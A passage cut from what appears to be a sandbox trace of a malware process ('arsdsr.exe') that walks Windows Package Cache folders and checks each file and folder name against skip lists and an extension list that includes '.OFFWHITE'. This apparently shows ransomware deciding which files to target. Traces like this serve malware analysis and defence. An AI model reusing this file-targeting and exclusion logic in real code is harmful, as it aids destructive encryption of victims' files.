ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.460] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.460] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.460] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.460] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.460] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b69ee00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7b69ee00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7b69ee00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0xfc90a, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.460] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.460] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" [0148.460] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0148.460] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.460] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.460] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.460] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.460] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.461] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0148.461] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="..") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="...") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="windows") returned -1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$recycle.bin") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="rsa") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ntuser.dat") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="programdata") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="appdata") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="program files") returned 1 [0148.461] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="program files (x86)") returned 1 [0148.461] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\" [0148.461] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="C:/Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0148.461] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.461] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.461] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.461] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.462] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.462] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.462] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.462] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0148.462] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.462] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.462] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.462] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2=".") returned 1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="..") returned 1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="...") returned 1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="windows") returned -1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="$recycle.bin") returned 1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="rsa") returned -1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="ntuser.dat") returned -1 [0148.462] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="programdata") returned -1 [0148.463] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="appdata") returned -1 [0148.463] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="program files") returned -1 [0148.463] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="program files (x86)") returned -1 [0148.463] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.463] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0148.463] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\" [0148.463] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\" [0148.463] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" [0148.463] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0149.768] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0149.768] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0149.768] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0149.768] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0149.768] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0149.768] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0149.768] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0149.769] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0149.769] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0149.769] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0149.769] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\" [0149.769] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0149.769] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\" [0149.769] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\" [0149.769] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" [0149.769] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0149.776] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0149.776] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0149.776] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0149.776] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0149.776] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0149.776] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0149.776] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="...") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="windows") returned -1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$recycle.bin") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="rsa") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ntuser.dat") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="programdata") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="appdata") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="program files") returned 1 [0149.777] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="program files (x86)") returned 1 [0149.777] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\" [0149.777] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0149.777] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" [0149.777] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" [0149.777] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*" [0149.777] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0149.778] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0149.779] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0149.779] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0149.779] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0149.779] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aae6600, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x8aae6600, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x8aae6600, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0149.779] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0149.779] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" [0149.779] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package 